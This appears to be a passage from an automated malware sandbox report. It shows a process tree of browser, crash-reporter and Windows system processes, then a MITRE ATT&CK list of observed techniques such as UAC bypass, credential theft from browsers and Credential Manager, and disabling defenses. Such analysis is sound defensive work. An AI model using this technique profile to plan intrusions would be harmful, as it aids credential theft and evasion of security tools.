  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=3856,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=3416 /prefetch:2
  2⤵
  PID:5988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=3880,i,10731853475737686447,11970948737319298644,262144 --variations-seed-version=20241108-050120.043000 --mojo-platform-channel-handle=5128 /prefetch:1
  2⤵
  PID:5348

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:5980
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:5156
- - C:\Program Files\Mozilla Firefox\crashreporter.exe
    "C:\Program Files\Mozilla Firefox\crashreporter.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\minidumps\c52e8324-17a4-44ce-9e13-a34a690903b3.dmp"
    3⤵
    PID:2368
  - - C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
      "C:\Program Files\Mozilla Firefox\minidump-analyzer.exe" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iz0mcgq4.default-release\minidumps\c52e8324-17a4-44ce-9e13-a34a690903b3.dmp"
      4⤵
      PID:4668

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2344 -ip 2344
1⤵
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2336

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
PID:5140

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:4420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Browser Extensions

T1176

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Power Settings

T1653

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Change Default File Association

T1546.001

Component Object Model Hijacking

T1546.015

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

System Information Discovery